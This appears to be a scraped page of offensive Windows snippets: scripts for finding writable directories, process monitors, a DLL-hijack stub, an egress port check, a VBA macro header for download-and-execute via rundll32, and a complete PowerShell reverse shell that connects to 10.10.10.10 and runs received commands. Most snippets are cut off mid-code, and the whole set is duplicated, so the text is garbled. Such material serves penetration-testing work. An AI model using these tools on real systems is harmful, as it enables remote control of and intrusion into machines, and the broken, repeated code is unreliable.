egre55 egre55

## find_writable_locations.bat
@echo off

REM Script to find writable locations under C:\

C:
cd C:\TEMP\

echo Creating list of all directories and sub-directories

dir C:\ /s /b /o:n /a:d > C:\Temp\dirs.txt

## procmon.ps1
# Simple PowerShell process monitor

while($true)
{

  $process = Get-WmiObject Win32_Process | Select-Object CommandLine
  Start-Sleep 1
  $process2 = Get-WmiObject Win32_Process | Select-Object CommandLine
  Compare-Object -ReferenceObject $process -DifferenceObject $process2

## procmon.bat
REM Ugly file-based process monitor script. Non-PowerShell in case blocked

@echo off

:loop

del file1.txt 2> nul
del file2.txt 2> nul

for /f "usebackq skip=1 tokens=* delims= " %%i in (`wmic path win32_process get commandline ^| findstr /r /v "[^\ ]"`) do echo %%i >> file1.txt

## calc.c
/*
  cl.exe /LD calc.c
  rundll32 shell32.dll,Control_RunDLL C:\Users\%username%\Desktop\calc.dll
  calc.c by @HollyGraceful
  https://www.gracefulsecurity.com/privesc-dll-hijacking/
*/

#include <windows.h>
int fireLazor()
{

## egress_check.ps1
# Ugly PowerShell egress check one-liner (works in Constrained Language Mode)
# NMap top 50 ports. Checking > 50 may cause Memory DoS

foreach ($i in 50,21,22,23,25,26,53,80,81,110,111,113,135,139,143,179,199,443,445,465,514,515,548,554,587,646,993,995,1025,1026,1027,1433,1720,1723,2000,2001,3306,3389,5060,5666,5900,6001,8000,8008,8080,8443,8888,10000,32768,49152,49154){Start-Job -ScriptBlock {param($i) & Test-NetConnection -ComputerName 10.10.10.10 -Port $i} -ArgumentList $i} Get-Job | Wait-Job | Get-Job | Receive-Job

## macro_download_and_execute_rundll32_powershdll_powershell.vba
' based on
' https://stackoverflow.com/questions/17877389/how-do-i-download-a-file-using-vba-without-internet-explorer
'
' PowerShdll.dll by @p3nt4
' https://github.com/p3nt4/PowerShdll
'
' rundll32 is a good candidate as blocking this abuse binary impacts certain Windows functionality - RDP/Office right-click
' shortcuts, and "run-as" a non-privileged user (perhaps a functionality edge-case)

Sub Document_Open()

## powershell_reverse_shell.ps1
# Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html

$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
	@echo off

	REM Script to find writable locations under C:\

	C:
	cd C:\TEMP\

	echo Creating list of all directories and sub-directories

	dir C:\ /s /b /o:n /a:d > C:\Temp\dirs.txt
	# Simple PowerShell process monitor

	while($true)
	{

	$process = Get-WmiObject Win32_Process \| Select-Object CommandLine
	Start-Sleep 1
	$process2 = Get-WmiObject Win32_Process \| Select-Object CommandLine
	Compare-Object -ReferenceObject $process -DifferenceObject $process2
	REM Ugly file-based process monitor script. Non-PowerShell in case blocked

	@echo off

	:loop

	del file1.txt 2> nul
	del file2.txt 2> nul

	for /f "usebackq skip=1 tokens=* delims= " %%i in (`wmic path win32_process get commandline ^\| findstr /r /v "[^\ ]"`) do echo %%i >> file1.txt
	/*
	cl.exe /LD calc.c
	rundll32 shell32.dll,Control_RunDLL C:\Users\%username%\Desktop\calc.dll
	calc.c by @HollyGraceful
	https://www.gracefulsecurity.com/privesc-dll-hijacking/
	*/

	#include <windows.h>
	int fireLazor()
	{
	# Ugly PowerShell egress check one-liner (works in Constrained Language Mode)
	# NMap top 50 ports. Checking > 50 may cause Memory DoS

	foreach ($i in 50,21,22,23,25,26,53,80,81,110,111,113,135,139,143,179,199,443,445,465,514,515,548,554,587,646,993,995,1025,1026,1027,1433,1720,1723,2000,2001,3306,3389,5060,5666,5900,6001,8000,8008,8080,8443,8888,10000,32768,49152,49154){Start-Job -ScriptBlock {param($i) & Test-NetConnection -ComputerName 10.10.10.10 -Port $i} -ArgumentList $i} Get-Job \| Wait-Job \| Get-Job \| Receive-Job
	' based on
	' https://stackoverflow.com/questions/17877389/how-do-i-download-a-file-using-vba-without-internet-explorer
	'
	' PowerShdll.dll by @p3nt4
	' https://github.com/p3nt4/PowerShdll
	'
	' rundll32 is a good candidate as blocking this abuse binary impacts certain Windows functionality - RDP/Office right-click
	' shortcuts, and "run-as" a non-privileged user (perhaps a functionality edge-case)

	Sub Document_Open()
	# Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html

	$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535\|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" \| Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()